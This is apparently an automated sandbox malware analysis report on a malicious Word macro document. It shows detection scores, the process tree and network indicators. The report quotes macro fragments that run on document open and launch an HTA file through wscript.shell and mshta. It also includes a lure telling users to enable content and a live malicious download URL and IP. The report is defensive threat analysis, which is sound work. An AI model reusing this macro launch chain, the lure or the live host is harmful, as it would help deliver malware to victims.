Loading ...

Play interactive tourEdit tour

Windows Analysis Report instruct_11.21.doc.docm

Overview

General Information

Sample Name:instruct_11.21.doc.docm
Analysis ID:520837
MD5:a9490d94cf547e27dcc0d52dc72e74e7
SHA1:a00e440eb13f84c8b8faba5b81a7d85fce2a4074
SHA256:ee103f8d64cd8fa884ff6a041db2f7aa403c502f54e26337c606044c2f205394
Tags:docmaldocsansiscvba
Infos:

Most interesting Screenshot:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Document contains an embedded VBA macro which may execute processes
Sigma detected: Suspicious MSHTA Process Patterns
Machine Learning detection for sample
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Document has an unknown application name
May sleep (evasive loops) to hinder dynamic analysis
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Internet Provider seen in connection with other malware
Document contains an embedded VBA macro which executes code when the document is opened / closed
Potential document exploit detected (performs DNS queries)
Document misses a certain OLE stream usually present in this Microsoft Office document type
Document contains no OLE stream with summary information
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 1708 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • explorer.exe (PID: 1212 cmdline: c:\windows\explorer c:\users\public\powPowNext.hta MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
  • explorer.exe (PID: 1832 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
    • mshta.exe (PID: 2696 cmdline: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\powPowNext.hta" MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Suspicious MSHTA Process PatternsShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\powPowNext.hta" , CommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\powPowNext.hta" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1832, ProcessCommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\powPowNext.hta" , ProcessId: 2696

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: instruct_11.21.doc.docmVirustotal: Detection: 49%Perma Link
Source: instruct_11.21.doc.docmReversingLabs: Detection: 43%
Antivirus detection for URL or domainShow sources
Source: http://shoulderelliottd.com/boolk/QlaJk8C6vYqIyEwbdypBHv3yJR/wrWWNCD/77427/bebys8?cid=Bm9cAP&wP8zhkKAvira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URLShow sources
Source: shoulderelliottd.comVirustotal: Detection: 9%Perma Link
Machine Learning detection for sampleShow sources
Source: instruct_11.21.doc.docmJoe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\explorer.exe
Source: global trafficDNS query: name: shoulderelliottd.com
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 194.62.42.144:80
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 194.62.42.144:80
Source: Joe Sandbox ViewASN Name: ZEISS-ASRU ZEISS-ASRU
Source: mshta.exe, 00000004.00000002.471762620.0000000006324000.00000004.00000001.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000004.00000002.470135401.00000000035D0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: mshta.exe, 00000004.00000002.471762620.0000000006324000.00000004.00000001.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000004.00000002.470135401.00000000035D0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
Source: mshta.exe, 00000004.00000002.470135401.00000000035D0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
Source: mshta.exe, 00000004.00000002.470284845.00000000037B7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: mshta.exe, 00000004.00000002.470284845.00000000037B7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000002.00000002.413158849.0000000001C10000.00000002.00020000.sdmp, explorer.exe, 00000003.00000002.413604612.0000000001E00000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: mshta.exe, 00000004.00000002.470284845.00000000037B7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: mshta.exe, 00000004.00000003.468746419.0000000005EF0000.00000004.00000040.sdmpString found in binary or memory: http://shoulderelliottd.com/boolk/QlaJk8C6vYqIyEwbdypBHv3yJR/wrWWNCD/77427/bebys8?cid=Bm9cAP&wP8zhkK
Source: mshta.exe, 00000004.00000002.470284845.00000000037B7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000002.00000002.413158849.0000000001C10000.00000002.00020000.sdmp, explorer.exe, 00000003.00000002.413604612.0000000001E00000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
Source: mshta.exe, 00000004.00000002.470135401.00000000035D0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: mshta.exe, 00000004.00000002.470284845.00000000037B7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: mshta.exe, 00000004.00000002.470135401.00000000035D0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: mshta.exe, 00000004.00000002.470135401.00000000035D0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{243B81DF-B272-4B3E-92C5-997100EFB3D7}.tmpJump to behavior
Source: unknownDNS traffic detected: queries for: shoulderelliottd.com
Source: C:\Windows\SysWOW64\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable editing" button on the top bar, and then click "Enable content" L O Page: I of I I Word
Source: Screenshot number: 4Screenshot OCR: Enable content" L O Page: I of I I Words: 116 I US I N@m 13 ;a 10096 G) FI G) ,, ' u .g',' lm
Document contains an embedded VBA macro which may execute processesShow sources
Source: instruct_11.21.doc.docmOLE, VBA macro line: dowYouKarol.exec "c:\windows\explorer " & dowGirlLoad
Document contains an embedded VBA macro with suspicious stringsShow sources
Source: instruct_11.21.doc.docmOLE, VBA macro line: Set dowYouKarol = CreateObject("wscript.shell")
Source: instruct_11.21.doc.docmOLE indicator application name: unknown
Source: ~WRF{54E91E67-388A-4A0C-84FA-B0F79F296DD3}.tmp.0.drOLE indicator application name: unknown
Source: instruct_11.21.doc.docmOLE, VBA macro line: Sub document_open()
Source: ~WRF{54E91E67-388A-4A0C-84FA-B0F79F296DD3}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: instruct_11.21.doc.docmOLE indicator has summary info: false
Source: ~WRF{54E91E67-388A-4A0C-84FA-B0F79F296DD3}.tmp.0.drOLE indicator has summary info: false
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: instruct_11.21.doc.docmOLE indicator, VBA macros: true
Source: C:\Windows\SysWOW64\mshta.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
Source: instruct_11.21.doc.docmVirustotal: Detection: 49%
Source: instruct_11.21.doc.docmReversingLabs: Detection: 43%
Source: C:\Windows\explorer.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\explorer.exe c:\windows\explorer c:\users\public\powPowNext.hta
Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\powPowNext.hta"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\explorer.exe c:\windows\explorer c:\users\public\powPowNext.htaJump to behavior
Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\powPowNext.hta" Jump to behavior
Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$struct_11.21.doc.docmJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD97C.tmpJump to behavior
Source: classification engineClassification label: mal92.expl.winDOCM@6/16@1/1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: mshta.exe, 00000004.00000002.470135401.00000000035D0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
Source: instruct_11.21.doc.docmOLE document summary: title field not present or empty
Source: instruct_11.21.doc.docmOLE document summary: edited time not present or 0
Source: ~WRF{54E91E67-388A-4A0C-84FA-B0F79F296DD3}.tmp.0.drOLE document summary: title field not present or empty
Source: ~WRF{54E91E67-388A-4A0C-84FA-B0F79F296DD3}.tmp.0.drOLE document summary: author field not present or empty
Source: ~WRF{54E91E67-388A-4A0C-84FA-B0F79F296DD3}.tmp.0.drOLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\explorer.exe
Source: unknownProcess created: C:\Windows\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\explorer.exeJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: instruct_11.21.doc.docmInitial sample: OLE summary keywords = ath.txeNwoPwop\cilbup\sresu\:c
Source: ~WRF{54E91E67-388A-4A0C-84FA-B0F79F296DD3}.tmp.0.drInitial sample: OLE indicators vbamacros = False
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exe TID: 1176Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\explorer.exe TID: 1176Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\explorer.exe TID: 2684Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\mshta.exe TID: 308Thread sleep time: -180000s >= -30000sJump to behavior
Source: explorer.exe, 00000003.00000003.412780793.000000000014C000.00000004.00000001.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\SysWOW64\mshta.exeMemory protected: page read and write | page guardJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting22Path InterceptionProcess Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution12Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion1LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools11Security Account ManagerRemote System Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSFile and Directory Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting22LSA SecretsSystem Information Discovery14SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 520837 Sample: instruct_11.21.doc.docm Startdate: 12/11/2021 Architecture: WINDOWS Score: 92 17 Multi AV Scanner detection for domain / URL 2->17 19 Antivirus detection for URL or domain 2->19 21 Multi AV Scanner detection for submitted file 2->21 23 6 other signatures 2->23 6 explorer.exe 2->6         started        8 WINWORD.EXE 338 30 2->8         started        process3 process4 10 mshta.exe 12 6->10         started        13 explorer.exe 1 8->13         started        dnsIp5 15 shoulderelliottd.com 194.62.42.144, 80 ZEISS-ASRU Russian Federation 10->15

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
instruct_11.21.doc.docm49%VirustotalBrowse
instruct_11.21.doc.docm43%ReversingLabsDocument-Word.Trojan.Valyria
instruct_11.21.doc.docm100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
shoulderelliottd.com10%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://www.%s.comPA0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://shoulderelliottd.com/boolk/QlaJk8C6vYqIyEwbdypBHv3yJR/wrWWNCD/77427/bebys8?cid=Bm9cAP&wP8zhkK100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
shoulderelliottd.com
194.62.42.144
truetrueunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkmshta.exe, 00000004.00000002.470284845.00000000037B7000.00000002.00020000.sdmpfalse
    high
    http://www.windows.com/pctv.mshta.exe, 00000004.00000002.470135401.00000000035D0000.00000002.00020000.sdmpfalse
      high
      http://investor.msn.commshta.exe, 00000004.00000002.470135401.00000000035D0000.00000002.00020000.sdmpfalse
        high
        http://www.msnbc.com/news/ticker.txtmshta.exe, 00000004.00000002.470135401.00000000035D0000.00000002.00020000.sdmpfalse
          high
          http://www.%s.comPAexplorer.exe, 00000002.00000002.413158849.0000000001C10000.00000002.00020000.sdmp, explorer.exe, 00000003.00000002.413604612.0000000001E00000.00000002.00020000.sdmpfalse
          • URL Reputation: safe
          low
          http://www.icra.org/vocabulary/.mshta.exe, 00000004.00000002.470284845.00000000037B7000.00000002.00020000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.explorer.exe, 00000002.00000002.413158849.0000000001C10000.00000002.00020000.sdmp, explorer.exe, 00000003.00000002.413604612.0000000001E00000.00000002.00020000.sdmpfalse
            high
            http://windowsmedia.com/redir/services.asp?WMPFriendly=truemshta.exe, 00000004.00000002.470284845.00000000037B7000.00000002.00020000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://www.hotmail.com/oemshta.exe, 00000004.00000002.470135401.00000000035D0000.00000002.00020000.sdmpfalse
              high
              http://shoulderelliottd.com/boolk/QlaJk8C6vYqIyEwbdypBHv3yJR/wrWWNCD/77427/bebys8?cid=Bm9cAP&wP8zhkKmshta.exe, 00000004.00000003.468746419.0000000005EF0000.00000004.00000040.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://investor.msn.com/mshta.exe, 00000004.00000002.470135401.00000000035D0000.00000002.00020000.sdmpfalse
                high

                Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public

                IPDomainCountryFlagASNASN NameMalicious
                194.62.42.144
                shoulderelliottd.comRussian Federation
                34464ZEISS-ASRUtrue

                General Information

                Joe Sandbox Version:34.0.0 Boulder Opal
                Analysis ID:520837
                Start date:12.11.2021
                Start time:21:18:33
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 5m 8s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:instruct_11.21.doc.docm
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Run name:Without Instrumentation
                Number of analysed new started processes analysed:7
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal92.expl.winDOCM@6/16@1/1
                EGA Information:Failed
                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 5
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .docm
